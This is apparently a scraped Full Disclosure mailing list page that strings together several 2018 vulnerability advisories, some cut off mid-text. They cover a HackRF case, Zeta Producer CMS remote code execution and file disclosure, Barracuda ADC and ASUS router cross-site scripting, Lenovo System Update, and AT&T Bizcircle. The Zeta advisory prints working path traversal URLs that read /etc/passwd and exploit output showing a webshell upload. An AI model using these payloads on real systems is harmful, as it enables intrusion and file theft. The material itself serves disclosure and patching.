==
S.AbenMassaoud [Vulnerability Laboratory Core Research Team] -
https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com   www.vuln-lab.com

www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com  paste.vulnerability-db.com  

infosec.vulnerability-db.com
Social: twitter.com/vuln_labfacebook.com/VulnerabilityLab   

youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
v

[FD] HackRF Circuit Board - New Universal Case for Devs & Pentesters

2018-07-12 Thread Vulnerability Lab 
Document Title:
===
HackRF Circuit Board - New Universal Case for Devs & Pentesters


References:
===
https://www.vulnerability-lab.com/get_content.php?id=2134

Download: https://www.vulnerability-lab.com/resources/documents/2134.rar

Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2018/07/11/new-hackrf-case-devs-pentesters-released-abs-pla


Release Date:
=
2018-07-11


Vulnerability Disclosure Timeline:
==
2018-07-11: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Technical Details & Description:

Normally the hackrf is delivered with a hard metal case, metal plates
and some screws like you can see in the following picture.

In all our tests and developments, the case was maninly useless because
of the device access and weight.

The following print includes a special 3 part case for the HackRF device
(PLA or ABS). The 3 part case allows you to interact with the board
during a running mode. The first part is the main part that holds the
hackrf board safe. The size of the case has been optimized for the board
for a handy usage.

Next to that the weight of the new case is much lower. The case is
handier and slimmer cut although it has all the information elements
like the original case. The first and third part of the case shows all
information of the device with the specific declarations (clkin,
clkout, usb, leds and more), one part is directly connected to the lower
part, the third part is attached like a cover.

In the regular metal case you have to use the screws and in the new case
there is no requirement for them anymore because of the
board is already stabilised through the pin holes with the basic nut bolt.

The usage of ABS is a better solution for this case then using PLA to
make the case more heat resistant. The full case with the SLDPRT
(Editable) and STL (Print) files can be downloaded from the official
vulnerability laboratory page in the documents section. Enjoy to
use and share the new hackrf case for your developments or pentests.


Credits & Authors:
==
Vulnerability Laboratory [Core Research Team]


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com   www.vuln-lab.com

www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com  paste.vulnerability-db.com  

infosec.vulnerability-db.com
Social: twitter.com/vuln_labfacebook.com/VulnerabilityLab   

youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution
Security GmbH]™

#hackrf #case #3dprinter

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SEC Consult SA-20180712-0 :: Remote Code Execution & Local File Disclosure in Zeta Producer Desktop CMS

2018-07-12 Thread SEC Consult Vulnerability Lab 

  
  
SEC Consult Vulnerability Lab Security Advisory < 20180712-0 >
===
  title: Remote Code Execution & Local File Disclosure
product: Zeta Producer Desktop CMS
 vulnerable version: <=14.2.0
  fixed version: >=14.2.1
 CVE number: CVE-2018-13981, CVE-2018-13980
 impact: critical
   homepage: https://www.zeta-producer.com
  found: 2017-11-25
 by: P. Morimoto (Office Bangkok)
 SEC Consult Vulnerability Lab 

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"With Zeta Producer, the website builder and online shop system for Windows, 
you can create and manage your website locally, on your computer. 
Get without expertise in 3 steps to your own homepage: select design, 
paste content, publish website. Finished."

Source: https://www.zeta-producer.com/de/index.html


Business recommendation:

The vendor provides a patched version which should be installed immediately.

Users of the product also need to verify that the affected widgets are updated in
the corresponding website project! It could be necessary to rebuild the whole project
or copy the new widgets to the website projects. For further information consult the
vendor.

Furthermore, an in-depth security analysis is highly advised, as the software may be
affected from further security issues.


Vulnerability overview/description:
---
1) Remote Code Execution (CVE-2018-13981)
The email contact functionality of the widget "formmailer" can upload files
to the server but if the user uploads a PHP script with a .php extension 
then the server will rename it to .phps to prevent PHP code execution.

However, the attacker can upload .php5 or .phtml to the server without any 
restriction. These alternative file extensions can be executed as PHP code. 

Furthermore, the server will create a folder to store the files, with a
random name using PHP's "uniqid" function.

Unfortunately, if the server permits directory listing, the attacker
can easily browse to the uploaded PHP script. If no directory listing is 
enabled the attacker can still bruteforce the random name to gain remote 
code execution via the PHP script as well. Testing on a local server it 
took about 20 seconds to brute force the random name. This attack will 
be slower over the Internet but it is still feasible.

Also, if the user runs the Zeta Producer Desktop CMS GUI client locally,
they are also vulnerable because the web server will be running on TCP port 9153.

The root cause is in the widget "formmailer" which is enabled by default.
The following files are affected:
- /assets/php/formmailer/SendEmail.php
- /assets/php/formmailer/functions.php


2) Local File Disclosure (CVE-2018-13980)
If the user enables the widget "filebrowser" on Zeta Producer Desktop CMS an 
unauthenticated attacker can read local files by exploiting path traversal issues. 

The following files are affected:
- /assets/php/filebrowser/filebrowser.main.php


Proof of concept:
-
1) Remote Code Execution (CVE-2018-13981)
The following python script can be used to exploit the chain of vulnerabilities.
[.. code has been removed to prevent misuses ..]

When the script is executed, a PHP script (shell) will be uploaded automatically.
# $ python exploit.py
# [+] injecting webshell to http://target/assets/php/formmailer/SendEmail.php
#
# 5a1a5bc991afe
# 5a1a5bc99453a
# 10812
# [*] Found :  http://target/assets/php/formmailer/upload_5a1a5bc992772/sectest.php5
# uid=33(www-data) gid=33(www-data) groups=33(www-data)


2) Local File Disclosure (CVE-2018-13980)
The parameter "file" in the "filebrowser.main.php" script can be exploited to read
arbitrary files from the OS with the privileges of the web server user.
Any unauthenticated user can exploit this issue!

http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download
http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc&do=list


Vulnerable / tested versions:
-
The following versions have been tested which were the latest version available 
at the time of the test:

Zeta Producer Desktop CMS 14.1.0
Zeta Producer Desktop CMS 14.2.0

Source: 
- https://www.zeta-producer.com/de/download.html
- https://github.com/ZetaSoftware/zeta-producer-content/


Vendor contact timeline:

2017-11-29: Contacting vendor through i...@zeta-producer.com and various other
email addresse

[FD] Barracuda ADC v5.x - Multiple Persistent Vulnerabilities

2018-07-12 Thread Vulnerability Lab 
Connection[keep-alive]
   Response Header:
  Server[BarracudaHTTP 4.0]
  Content-Type[text/html; charset=utf-8]
  Connection[keep-alive]
  Set-Cookie[_ga=GA1.2.608616028.1422207688; path=/_gat=1; path=/]
  Content-Length[112822]
  Pragma[no-cache]
  X-Frame-Options[SAMEORIGIN]


Reference(s):
http://adc.localhost:8080/
http://adc.localhost:8080/cgi-mod/index.cgi
http://adc.localhost:8080/cgi-mod/build_status_expiration_display_content.cgi


Solution - Fix & Patch:
===
The vulnerability can be patched by a secure parse and encode of the
vulnerable last hour, last day and last week input field values.
Restrict the input and disallow special chars. Filter the context of the
values to prevent an execution of script code and implement
a secure valudatuib mechanism to the broken output in the dashboard service.

Note: The issue was reported in 2016 to the barracuda networks developer
team. The issue was finally resolved in 2017 Q1 - Q4.
The disclosure process took about 1 year to complete by recognizing the
patch cycle.


Security Risk:
==
The security risk of the persistent input validation web vulnerability
in the barracuda networks adc appliance web-application is estimated as
medium.



Credits & Authors:
==
Benjamin K.M. (Vulnerability Laboratory Core Research Team) -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=====
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or
implied, including the warranties of merchantability and capability for
a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any
case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability Labs
or its
suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability mainly for
incidental
or consequential damages so the foregoing limitation may not apply. We
do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need
for criminal activities or membership requests. We do not publish
advisories
or vulnerabilities of religious-, militant- and racist-
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails,
phone numbers, conversations or anything else to journalists,
investigative authorities or private individuals.

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
-
www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php-
vulnerability-lab.com/list-of-bug-bounty-programs.php   -
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   -
vulnerability-lab.com/rss/rss_upcoming.php  -
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
-
youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this
file, resources or information requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other media, are
reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is
trademark
of vulnerability-lab team & the specific authors or managers. To record,
list, modify, use or edit our material contact (admin@) to get an ask
permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution
Security GmbH]™


-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Lenovo SU v5.07 - Buffer Overflow & Arbitrary Code Execution Vulnerability

2018-07-12 Thread Vulnerability Lab 
File flags:   0 (Mask 3F)
File OS:  4 Unknown Win32
File type:1.0 App
File date:.
Translations: 0409.04b0
ProductName:  Map Network Drive
InternalName: mapdrv
OriginalFilename: mapdrv.exe
ProductVersion:   1, 0, 0, 1
FileVersion:  1, 0, 0, 1
FileDescription:  Map Network Drive Application
LegalCopyright:   Copyright Lenovo 2005, 2006, all rights reserved.
Copyright IBM Corporation 1996-2005, all rights reserved.


Solution - Fix & Patch:
===
Update Lenovo System Update to version 5.07.0072 or later. You can
determine the currently installed version by
opening Lenovo System Update, clicking on the green question mark in the
top right corner and then selecting “About.”

Lenovo System Update can be updated by choosing either of the following
methods:

Lenovo System Update automatically checks for a later version whenever
the application is run.
Click OK when prompted that a new version is available.
To manually update, download the latest version from the following URL:
https://support.lenovo.com/en/documents/ht080136


Security Risk:
==
The security risk of the buffer overflow and arbitrary code execution
vulnerability is estimated as high.


Credits & Authors:
==
S.AbenMassaoud (Vulnerability Laboratory Core Research Team) -
https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com   www.vuln-lab.com

www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com  paste.vulnerability-db.com  

infosec.vulnerability-db.com
Social: twitter.com/vuln_labfacebook.com/VulnerabilityLab   

youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution
Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] AT&T Bizcircle - Persistent Profile Cross Site Scripting Vulnerabilities

2018-07-11 Thread Vulnerability Lab 
tus: 200[OK]
GET
https://bizcircle.att.com/members/att1759500603/profile/edit/group/1/evil.source/

Mime Type[text/html]
   Request Header:
  Host[bizcircle.att.com]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:54.0)
Gecko/20100101 Firefox/54.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]

Referer[https://bizcircle.att.com/members/att1759500603/profile/edit/group/1/]
  Cookie[PHPSESSID=l18mlg2dueco0q3h6kb131eub7;
AMCV_55633F7A534535110A490D44%40AdobeOrg=2096510701%7CM
CIDTS%7C17396%7CMCMID%7C26100431646396483062447545331633367848%7CMCAAMLH-1503573649%7C6%7CMCAAMB-1503573649
%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1502976049s%7CNONE%7CMCAID%7CNONE%7CMCSYNCSOP%7C411-17403%7CvVersion%7C2.0.0;

mbox=session#1502968849133-685067#1502970967|PC#1502968849133-685067.26_19#1504178707;
AMCVS_55633F7A534535110
A490D44%40AdobeOrg=1; _ga=GA1.2.774089946.1502968850;
_gid=GA1.2.1647846308.1502968850;
s_cc=true; bp-activity-oldestpage=1;
aam_uuid=26195646366965627042419912699465776394;
Successful Registration=true; TLTSID=DFFB796CF9727EB3DAD892F1CE4732DB;
fsr.s={"v2":1,"v1":1,"rid":"d036702-53861434-b5e4-2910-b41f2",
"cp":{"ufix":"no","ug":"n","platform":"mSite","WLS_TSR":"no"},"to":4.5,"pv":6,"f":1502969105924};
wordpress_logged_in_cae26c4a20b3aee9c355ac89848c9a6c=att1759500603%7C1503141687%7C5r0gGlSD0k4TLZ8DdczeF
GgpYJrrbeqwy9p8pvslaMr%7Cab6915c095b9e9a27373469d6f4cae49510879dab933281d16868d1cf4bd524a;
_gat=1]
  Connection[keep-alive]
   Response Header:
  Server[Apache]
  X-Frame-Options[SAMEORIGIN]
  Cache-Control[no-cache, must-revalidate, max-age=0]
  X-UA-Compatible[IE=edge]
  Content-Type[text/html; charset=UTF-8]
  Vary[Accept-Encoding]
  Content-Encoding[gzip]
  Content-Length[19404]
  Connection[keep-alive]


Reference(s):
https://bizcircle.att.com/
https://bizcircle.att.com/members/
https://bizcircle.att.com/members/att1759500603/
https://bizcircle.att.com/members/att1759500603/profile/
https://bizcircle.att.com/members/att1759500603/profile/edit/
https://bizcircle.att.com/members/att1759500603/profile/edit/group/
https://bizcircle.att.com/members/att1759500603/profile/edit/group/1/


Solution - Fix & Patch:
=======
The vulnerability has been patched by the at&t developer team of the biz
circle team. The issue was part of the official bug bounty program.


Security Risk:
==
The security risk of the persistent cross site vulnerabilities in the
web-application are estimated as medium (CVSS 4.6).


Credits & Authors:
==
Benjamin K.M. [Vulnerability Laboratory Core Research Team] -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or
implied, including the warranties of merchantability and capability for
a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any
case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability Labs
or its
suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability mainly for
incidental
or consequential damages so the foregoing limitation may not apply. We
do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need
for criminal activities or membership requests. We do not publish
advisories
or vulnerabilities of religious-, militant- and racist-
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails,
phone numbers, conversations or anything else to journalists,
investigative authorities or private individuals.

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
-
www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php-
vulnerability-lab.com/list-of-bug-bounty-programs.php   -
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   -
vulnerability-lab.com/rss/rss_upcoming.php  -
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
-
youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this
file, resources or information requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other media, are
reserved by
Vulnerability Lab Research Tea

[FD] Barracuda ADC 5.x - Client Side Cross Site Scripting Vulnerability

2018-07-11 Thread Vulnerability Lab 
cal&content_only=1&group=evil.source[NON-PERSISTENT
INJECTED SCRIPT CODE
PAYLOAD!]%3Ecross-site-scripting&locale=de_DE&new_secondary_tab=view_internal_patterns&primary_tab=SECURITY&realm=&secondary_tab=copy_internal_attack_patterns&user=guest&ispopup=1&parent_name=libraries496409&popup_width=725&popup_height=500]
  Cookie[_ga=GA1.2.608616028.1422207688;
_ga=GA1.2.608616028.1422207688; _gat=1]
  Connection[keep-alive]
   Response Header:
  Server[BarracudaHTTP 4.0]
  Content-Type[text/html]
  Content-Length[1949]
  Connection[close]
-
Status: 500[Internal Server Error]
GET http://adc.localhost:8080/cgi-mod/evil.source[CLIENT SIDE SCRIPT
CODE EXECUTION!]
Mime Type[text/html]
   Request Header:
  Host[adc.localhost:8080]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0)
Gecko/20100101 Firefox/35.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]

Referer[http://adc.localhost:8080/cgi-mod/index.cgi?password=48c669c1112b5fd89648930d335f0d8b&et=141302&auth_type=Local&content_only=1&group=evil.source[NON-PERSISTENT
INJECTED SCRIPT CODE
PAYLOAD!]%3Ecross-site-scripting&locale=de_DE&new_secondary_tab=view_internal_patterns&primary_tab=SECURITY&realm=&secondary_tab=copy_internal_attack_patterns&user=guest&ispopup=1&parent_name=libraries496409&popup_width=725&popup_height=500]
  Cookie[_ga=GA1.2.608616028.1422207688;
_ga=GA1.2.608616028.1422207688; _gat=1]
  Connection[keep-alive]
   Response Header:
  Server[BarracudaHTTP 4.0]
  Content-Type[text/html]
  Content-Length[1949]
  Connection[close]


Reference(s):
http://adc.localhost:8080/
http://adc.localhost:8080/cgi-mod/
http://adc.localhost:8080/cgi-mod/index.cgi
http://adc.localhost:8080/cgi-mod/index.cgi?password=
http://adc.localhost:8080/cgi-mod/index.cgi?password=x&et=x
http://adc.localhost:8080/cgi-mod/index.cgi?password=x&et=x&auth_type=Local
http://adc.localhost:8080/cgi-mod/index.cgi?password=x&et=x&auth_type=Local&content_only=
http://adc.localhost:8080/cgi-mod/index.cgi?password=x&et=x&auth_type=Local&content_only=1&group=


Solution - Fix & Patch:
===
The vulnerability can be patched by a parse and encode of the vulnerable
group value in the copy|kopieren module GET method request.
Restrict the input and disallow the usage of special chars to prevent
client-side script code injection attacks.
Implement a secure exception-handling to prevent client-side script code
injection attacks.

Note: The issue has been reported in 2016 Q4 (2016-10-01) and was
finally resolved in 2017 Q3 - Q4 by the barracuda networks
developer team in all appliance series.


Security Risk:
==
The security risk of the non-persistent input validation web
vulnerability in the barracuda networks adc appliance web-application is
estimated as medium (CVSS 3.6).


Credits & Authors:
==
Benjamin K.M. -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or
implied, including the warranties of merchantability and capability for
a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any
case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability Labs
or its
suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability mainly for
incidental
or consequential damages so the foregoing limitation may not apply. We
do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need
for criminal activities or membership requests. We do not publish
advisories
or vulnerabilities of religious-, militant- and racist-
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails,
phone numbers, conversations or anything else to journalists,
investigative authorities or private individuals.

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
-
www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php-
vulnerability-lab.com/list-of-bug-bounty-programs.php   -
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   -
vulnerability-lab.com/rss/rss_upcoming.php  -
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab    - facebook.com/VulnerabilityLab 
-
youtube.com/user/vulnera

[FD] Barracuda ADC 5.x - Filter Bypass & Persistent Validation Vulnerability

2018-07-11 Thread Vulnerability Lab 
  Connection[keep-alive]


Reference(s):
http://adc.localhost:8080/restapi/v2/virtual_service_groups/Content_Routing/virtual_services/Corp_Web/content_rules/
http://adc.localhost:8080/restapi/v2/virtual_service_groups/Content_Routing/virtual_services/Corp_Web/
http://adc.localhost:8080/restapi/v2/virtual_service_groups/Content_Routing/virtual_services/
http://adc.localhost:8080/restapi/v2/virtual_service_groups/Content_Routing/
http://adc.localhost:8080/restapi/v2/virtual_service_groups/


Solution - Fix & Patch:
===
The vulnerability can be patched by a parse and encode of the vulnerable
content rules input field values.
Restrict the input and disallow special chars. Filter and parse the item
listing in the configured server module to prevent an execution.
Implement a own exception-handling to prevent application-side script
code executions.


Security Risk:
==
The security risk of the persistent input validation web vulnerability
in the barracuda networks adc appliance
web-application is estimated as medium (CVSS 3.8).

Note: The issue was reported in 2016 to the barracuda networks developer
team. The issue was finally resolved in 2017 Q1 - Q4.
The disclosure process took about 1 year to complete by recognizing the
patch cycle.


Credits & Authors:
==
Benjamin K.M. -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or
implied, including the warranties of merchantability and capability for
a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any
case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability Labs
or its
suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability mainly for
incidental
or consequential damages so the foregoing limitation may not apply. We
do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need
for criminal activities or membership requests. We do not publish
advisories
or vulnerabilities of religious-, militant- and racist-
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails,
phone numbers, conversations or anything else to journalists,
investigative authorities or private individuals.

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
    -
www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php-
vulnerability-lab.com/list-of-bug-bounty-programs.php   -
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   -
vulnerability-lab.com/rss/rss_upcoming.php  -
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
-
youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this
file, resources or information requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other media, are
reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is
trademark
of vulnerability-lab team & the specific authors or managers. To record,
list, modify, use or edit our material contact (admin@) to get an ask
permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution
Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] ASUS WRT-AC66U 3.x - Cross Site Scripting Vulnerability

2018-07-11 Thread Vulnerability Lab 
ype[text/html]
   Request Header:
  Host[event.localhost]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0)
Gecko/20100101 Firefox/49.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Referer[http://event.localhost/nw/_ui/en/Advanced_System_Content.html]
  Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
  If-Modified-Since[Thu, 20 Jun 2013 05:45:19 GMT]
  If-None-Match["31793159796dce1:0"]
  Cache-Control[max-age=0]
   Response Header:
  Content-Type[text/html]
  Last-Modified[Thu, 20 Jun 2013 05:45:19 GMT]
  Etag["31793159796dce1:0"]
  Connection[keep-alive]
-
Status: 200[OK]
GET http://event.localhost/nw/_ui/en/evil.source%3C/td
Mime Type[text/html]
   Request Header:
  Host[event.localhost]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0)
Gecko/20100101 Firefox/49.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Referer[http://event.localhost/nw/_ui/en/ParentalControl.html]
  Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   Response Header:
  Content-Type[text/html]
  Server[Microsoft-IIS/7.5]
  X-Powered-By[ASP.NET]
  Content-Length[1245]
  Connection[keep-alive]


Reference(s):
http://event.localhost/
http://event.localhost/nw/
http://event.localhost/nw/_ui/


Solution - Fix & Patch:
===
The issue has been reported in 2016 Q4 (2016-11-09) and was finally
resolved in 2017 Q3 - Q4 by the asus wrt developer team. The public
disclosure process took about 10 month.


Security Risk:
==
The security risk of the persistent cross site scripting web
vulnerability in the asus wrt ui is estimated as medium (CVSS 3.0).


Credits & Authors:
======
Lawrence Amer (Vulnerability Lab Core Research Team)
[zeroat...@gmail.com] -
https://www.vulnerability-lab.com/show.php?user=Lawrence+Amer


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or
implied, including the warranties of merchantability and capability for
a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any
case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability Labs
or its
suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability mainly for
incidental
or consequential damages so the foregoing limitation may not apply. We
do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need
for criminal activities or membership requests. We do not publish
advisories
or vulnerabilities of religious-, militant- and racist-
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails,
phone numbers, conversations or anything else to journalists,
investigative authorities or private individuals.

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
-
www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php-
vulnerability-lab.com/list-of-bug-bounty-programs.php   -
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   -
vulnerability-lab.com/rss/rss_upcoming.php  -
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
-
youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this
file, resources or information requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other media, are
reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is
trademark
of vulnerability-lab team & the specific authors or managers. To record,
list, modify, use or edit our material contact (admin@) to get an ask
permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution
Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Intel System CU - Buffer Overflow (Denial of Service) Vulnerability

